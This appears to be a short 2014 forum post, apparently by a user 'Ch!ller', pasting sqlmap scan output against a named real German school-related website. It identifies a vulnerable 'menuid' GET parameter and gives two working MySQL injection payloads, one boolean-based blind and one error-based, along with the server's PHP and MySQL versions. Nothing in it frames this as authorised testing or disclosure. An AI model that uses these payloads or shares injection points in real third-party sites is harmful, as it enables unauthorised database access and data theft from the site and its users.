http://www.schuleplus-mv.de/index.php?menuid=xxmenuidxx Place: GET Parameter: menuid Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: menuid=xxmenuidxx%' RLIKE (SELECT (CASE WHEN (8771=8771) THEN 0x78786d656e7569647878 ELSE 0x28 END)) AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: menuid=xxmenuidxx%' AND (SELECT 3253 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (CASE WHEN (3253=3253) THEN 1 ELSE 0 END)),0x717a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' --- web application technology: Apache, PHP 5.2.17 back-end DBMS: MySQL 5.0
Bearbeitet von Ch!ller, 03 December 2014 - 14:10 Uhr.